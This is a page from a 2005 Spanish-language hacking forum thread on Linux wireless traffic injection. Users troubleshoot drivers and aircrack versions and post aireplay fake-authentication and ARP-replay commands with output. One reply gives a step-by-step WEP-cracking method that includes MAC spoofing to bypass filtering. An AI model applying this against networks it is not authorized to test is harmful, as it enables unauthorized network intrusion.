elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 08:46  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless (Moderadores: Uxio, pianista, ChimoC)
| | |-+  Todo sobre inyeccion de trafico con linux
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 6 7 8 [9] 10 Ir Abajo Respuesta Imprimir
Autor Tema: Todo sobre inyeccion de trafico con linux  (Leído 27,333 veces)
Hwagm
Colaborador
***
Desconectado Desconectado

Mensajes: 7.539



Ver Perfil WWW
Re: Todo sobre inyeccion de trafico con linux
« Respuesta #120 en: 9 Septiembre 2005, 05:00 »

Perdona kosuke tuve un error en el enlace de la pagina ya lo he corregido seria:

http://hwagm.elhacker.net/linux2/rt2500-cvs-20050826.tgz

Mis disculpas, ademas se lo pase por mensaje a alguien mas y ya no me acuerdo.


En línea


kosuke

Desconectado Desconectado

Mensajes: 110


Ver Perfil
Re: Todo sobre inyeccion de trafico con linux
« Respuesta #121 en: 9 Septiembre 2005, 14:27 »

Hwagm ya he podido probar lo del rate, con la rt2500 no he necesitado meterle el nuevo driver, funciona ok. si kieres ponerlo a 5Mb/s yo he puesto iwconfig [interface] rate 5M y cuela, si solo pones 5 no.
En cuanto a la prism54 no lo he conseguido, sigue con sus 54Mb/s, mirare a ver que encuentro al respecto.


En línea
Hwagm
Colaborador
***
Desconectado Desconectado

Mensajes: 7.539



Ver Perfil WWW
Re: Todo sobre inyeccion de trafico con linux
« Respuesta #122 en: 9 Septiembre 2005, 16:37 »

Aun asi siempre es mejor colocar el nuevo driver. Yo lo use y me funciona bien la reinyeccion sea el ataque 1 o el 3.
En línea


Hwagm
Colaborador
***
Desconectado Desconectado

Mensajes: 7.539



Ver Perfil WWW
Re: Todo sobre inyeccion de trafico con linux
« Respuesta #123 en: 26 Septiembre 2005, 23:51 »

http://foro.elhacker.net/index.php/topic,85459.msg397185.html#msg397185
En línea


PIRITEL

Desconectado Desconectado

Mensajes: 22


Ver Perfil
Re: Todo sobre inyeccion de trafico con linux
« Respuesta #124 en: 20 Octubre 2005, 16:09 »

Hola, os voy a contar mis experiencias( desastrosas de momento) con la inyeccio, reinyección a ver si alguien me dice que puede pasar, problema de drivers? del aircrack?, mio?......
distro: SUSE 10 @ 2.6.13
drivers:  madwifi-cvs-20051008
patch:  madwifi-cvs-20051008.patch
program: aircrack 2.3
hard: netgear wg511t (artheros)
he probado de 2 maneras, con el airodump con el centrino y escuchado con la artheros y airodump y escucha artheros.

ejecuto airmon.sh start eth1
           aiermon.sh ath0
session 1
hacktool:~ #airodump eth1 prueba 11

Citar
BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID

 00:0E:6A:D3:DB:61   -1      452     3247  11  54  WEP   WIFI

 BSSID              STATION            PWR  Packets  ESSID

 00:0E:6A:D3:DB:61  00:01:02:03:04:05          3613  WIFI
session 2
Citar
acktool:~ # aireplay -1 30 -e "WIFI" -a 00:0E:6A:D3:DB:61  -b 00:0E:6A:D3:DB:61 -h 0:1:2:3:4:5 ath0
08:40:54  Sending Authentication Request
08:40:54  Authentication successful
08:40:54  Sending Association Request
08:40:59  Sending Authentication Request
08:40:59  Authentication successful
08:40:59  Sending Association Request
08:40:59  Association successful :-)
08:41:14  Sending keep-alive packet
08:41:29  Sending Authentication Request
08:41:29  Authentication successful
08:41:29  Sending Association Request
08:41:34  Sending Authentication Request
08:41:34  Authentication successful
08:41:34  Sending Association Request
08:41:34  Association successful :-)
session 3
Citar
hacktool:~ # aireplay -3 -b 00:0E:6A:D3:DB:61 -h 0:1:2:3:4:5 -x 512 ath0
Saving ARP requests in replay_arp-1020-084156.cap
You must also start airodump to capture replies.
Got a deauth/disassoc packet from the AP - the source MAC you
have specified is probably not authenticated. Try attack "-1".
Got a deauth/disassoc packet from the AP - the source MAC you
have specified is probably not authenticated. Try attack "-1".
Read 9545 packets (got 268 ARP requests), sent 3528 packets...
se para ahi en esos 3247 ivs y ni capta mas beacons ni ivs parece que esta frito. Se keda todo colgado y el iwconfig no hace nada, tengo que apagar y al apagar se queda frito otra vez en shutdown network interfaces y le he de dar al boton.
Pasao esto cuando arranco y hago el mismo rollo con la ath0 con airodump y aireplay el airodump sale:
Citar
BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID

 00:0E:6A:D3:DB:61   26     3452        0  11  54  WEP?  WIFI

 BSSID              STATION            PWR  Packets  ESSID
y el aireplay  pone:
Citar
hacktool:~ # aireplay -1 30 -e "WIFI" -a 00:0E:6A:D3:DB:61  -b 00:0E:6A:D3:DB:                       61 -h 0:1:2:3:4:5 ath0
16:02:56  Sending Authentication Request
16:02:58  Sending Authentication Request
16:03:01  Sending Authentication Request
16:03:03  Sending Authentication Request
16:03:05  Sending Authentication Request
16:03:07  Sending Authentication Request
16:03:10  Sending Authentication Request

Attack was unsuccessful. Possible reasons:
y ya no hay manera la session 3 esta:
Citar
hacktool:~ # aireplay -3 -b 00:0E:6A:D3:DB:61 -h 0:1:2:3:4:5 -x 512 ath0
Saving ARP requests in replay_arp-1020-154003.cap
You must also start airodump to capture replies.
Read 20452 packets (got 0 ARP requests), sent 0 packets...
Read 23812 packets (got 0 ARP requests), sent 0 packets...
El punto de acceso esta a 15 mts es de pruebas de mi trabajo, hago esto por enseñar a un empleado que la clave WEP es "insegura", pero me esta enganxando poco a poco.
Salu2 a to2.
En línea
yadnus


Desconectado Desconectado

Mensajes: 338


Ver Perfil
Re: Todo sobre inyeccion de trafico con linux
« Respuesta #125 en: 20 Octubre 2005, 16:40 »

A mi me pasa lo mismo con mi atheros. Es por el aircrack 2.3 y el driver madwifi de Agosto que usas. Utiliza una version mas antigua de aircrack (la mia es aircrack-2.2_beta12) y los drivers de madwifi de Julio. Con eso si que me va , aunque a veces se queda pillado como dices, y tengo que salir del airodump y aireplay(-1 y -3) para volver a repetir los pasos y todo vuelve a ir OK.
En línea
PIRITEL

Desconectado Desconectado

Mensajes: 22


Ver Perfil
Re: Todo sobre inyeccion de trafico con linux
« Respuesta #126 en: 20 Octubre 2005, 18:08 »

Oks, gracias yadnus otra vez, una cosa para cambiar los drivers sigo los masos del manual del aircrack 2.3,  rmmod xxx 2> /de/null y eso de buscar los archivos .ko correspondientes al driver y eliminarlos?...
Y el aircrack para cambiar la version gago un make clean?
y luego instalo el otro?...
En línea
o2T7f6j2
echo -e "Nos vemos en \n$(pwd)"


Desconectado Desconectado

Mensajes: 2.782


./configure --enable-levitation --enable-diamagnet


Ver Perfil
Re: Todo sobre inyeccion de trafico con linux
« Respuesta #127 en: 20 Octubre 2005, 18:19 »

Para saber dónde están los .ko puedes probar a hacer
#modprobe -l madwi*
 Para eliminar el driver
#modprobe -r nombre_del_driver(sin el .ko, sólo el nombre)

Salu2
En línea


No debemos perder la fe en la humanidad que es como el océano: no se ensucia porque algunas de sus gotas estén sucias.Mahatma Gandhi (2 de Octubre del 1869 - 30 de Enero del 1948)
Hwagm
Colaborador
***
Desconectado Desconectado

Mensajes: 7.539



Ver Perfil WWW
Re: Todo sobre inyeccion de trafico con linux
« Respuesta #128 en: 20 Octubre 2005, 21:44 »

Bueno si a mas de uno le pasa lo mismo supongo que habra de dar por bueno la teoria de yadnus de que el aircrack viejo  funcionamejor respecto a ese ataque y ciertos drivers de madwifi.

En línea


fotolog

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Todo sobre inyeccion de trafico con linux
« Respuesta #129 en: 21 Octubre 2005, 01:42 »

HOLA SOY SANTIAGO Y ME GUSTARIA UN TENER UN POKO DE CHAT Y KONOCER ACERCA DE ESTO. MI E-MAIL ES: 

LAURENO29@HOTMAIL.COM
En línea

VISA
t321


Desconectado Desconectado

Mensajes: 1.157



Ver Perfil WWW
Re: Todo sobre inyeccion de trafico con linux
« Respuesta #130 en: 21 Octubre 2005, 01:47 »

 :o :o :o :o :o :o :o :o :o :o

Que tendrá esto que ver con reinyeccion. Lo pensaré esta noche.

Nos vemos
En línea

www.seguridadwireless.net/foro <-- foro ;D


"Nunca discutas con un imbecil, te rebajaras a su altura y te machacara con su experiencia." by un people


yadnus


Desconectado Desconectado

Mensajes: 338


Ver Perfil
Re: Todo sobre inyeccion de trafico con linux
« Respuesta #131 en: 21 Octubre 2005, 08:18 »

¿Que si tiene que ver con la reinyección? Pues esta bien claro que si, precisamente estamos hablando de porque no funciona en determinadas circunstancias la reinyección con Atheros.

Yo no estoy seguro de si tiene que ver con el kernel de Linux, porque creo recordar que en el readme de aircrack se dice que los drivers de Madwifi de Agosto no van bien con algunas distros, en cuyo caso Devine recomienda regresar a la versión de Julio.

En cuanto a borrar los módulos si, haces lo que pone en aircrack:
 find /lib/modules -name 'ath*'  -exec rm -v {} \;
 find /lib/modules -name 'wlan*' -exec rm -v {} \;

Eso te borrará los módulos, creo que estan en /lib/modules/{uname -r}/net

Ahora lo que te digo de que no me funciona esta comprobado. Un paquete ARP bueno, salvado de una red cifrada que rompi hace tiempo y que iba OK en versiones antiguas, en aircrack 2.3 nada, no subian los IVs, ni saliendo de todo y volviendo a entrar. Fue reinstalar los drivers de Julio de Madwifi y ponerme con aircrack beta 12 y todo volvio a ser como antes. Ahora mismo si vuelvo a intentarlo con la versión 2.3 pero manteniedo los drivers de Julio que tengo instalados en lugar de los de Agosto tampoco me va.
       


En línea
PIRITEL

Desconectado Desconectado

Mensajes: 22


Ver Perfil
Re: Todo sobre inyeccion de trafico con linux
« Respuesta #132 en: 21 Octubre 2005, 08:52 »

Oks yadnus, te voy a dar la razón porke lo he podido comprobar, al menos en mi caso = que el tuyo con artheros con los drivers de julio y aircrack 2.2 b12 me fue bien, no probé mucho pero lo poco que probe fue con el atake 3 con un cliente conectado, y cuando reinicie el cliente fue cuando engancho algun arp request (que por cierto me llego a poner 1024 arp request) y se puso a inyectar como un loco.
Tambien observe que el punto de acceso pasaba de mi en atake 1, pero que si lo reseteaba, enseguida me enganchaba el atake 1 y luego al rato pasaba de mi otra vez, puede que el punto de acceso que eche???....
Este finde me levare un punto de acceso a casa y seguiré haciendo pruebas a ver que tal.
Ah, una cosa, que orden de atakes sigues tu yadnus en caso de que haya algún cliente conectado, y sin cliente?.
Como guardas los paquetes ARP buenos con Kismet o airodump?....
Salu2
En línea
yadnus


Desconectado Desconectado

Mensajes: 338


Ver Perfil
Re: Todo sobre inyeccion de trafico con linux
« Respuesta #133 en: 21 Octubre 2005, 11:49 »

Yo lo que hago es poner el airodump lo primero y ponerme a esnifar. Si veo que no salen IVs por ningún lado, corto y cierro porque eso quiere decir que no hay tráfico. Si veo que salen IVs pues realizo el ataque -1 en otro terminal, que se autentica, bien, que no, ya tenemos otro problema, intento bajar el rate a 1M para conseguir mayor potencia e intento de nuevo el -1, que si ok, que no la cagamos :-),puede ser que  el tipo tenga filtrado MAC, en ese caso esperamos a que el airodump nos muestre en el tráfico que pilla la MAC de algun cliente conectado, nos ponemos esa MAC nosotros e intentamos el ataque -1 de nuevo. Si no va ni aun asi, entonces es que no llegamos, asi pues como no pongamos una antena mejor poco mas podemos hacer.

Cuando el ataque -1 va entonces en otro terminal vamos a por el -3 y esperamos el bendito ARP, se pondrá a reinyectarlo y si hay suerte veremos como suben los IVs del airodump como la espuma. Si no suben paro el -3 y lo vuelvo a repetir hasta que pille otro ARP y suban los IVs.  Si vemos que el airodump muestra la subida de IVs pero repentinamente se paran, entonces lanzo de nuevo el ataque -1 sin parar ni el -3 ni el airodump, suele funcionar, y a veces tengo que repetirlo muchas veces porque se para de vez en cuando. Si alguna vez no suben los IVs ni aun haciendo eso es cuando paro todo y vuelvo empezar con una diferencia, en lugar de hacer el ataque -3 esperando a que capte el ARP lo que hago es enviar el ARP que ya pillo antes y que sé que funciona, para eso esta la opción -r, el aireplay siempre guarda lo que pilla en ficheros replayXXXXXX , asi que lo que hago es cambiar el nombre del replayXXXXX a un nombre como por ejemplo Wireless.arp y reenvio los ARP a partir de ese fichero, lo demás igual que antes.
En línea
t321


Desconectado Desconectado

Mensajes: 1.157



Ver Perfil WWW
Re: Todo sobre inyeccion de trafico con linux
« Respuesta #134 en: 21 Octubre 2005, 12:02 »

Citar
¿Que si tiene que ver con la reinyección? Pues esta bien claro que si, precisamente estamos hablando de porque no funciona en determinadas circunstancias la reinyección con Atheros.

Yo me refiero a esto???

Citar
HOLA SOY SANTIAGO Y ME GUSTARIA UN TENER UN POKO DE CHAT Y KONOCER ACERCA DE ESTO. MI E-MAIL ES:

LAURENO29@HOTMAIL.COM

Sigo sin entender a que viene este post.

Respecto a lo anterior vale no digo nada.

A lo mejor lo que quiere es que lo agregemos porque tiene el problema, si es eso pido perdon a  fotolog.

Nos vemos.
En línea

www.seguridadwireless.net/foro <-- foro ;D


"Nunca discutas con un imbecil, te rebajaras a su altura y te machacara con su experiencia." by un people


Páginas: 1 2 3 4 5 6 7 8 [9] 10 Ir Arriba Respuesta Imprimir 

Ir a:  

Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines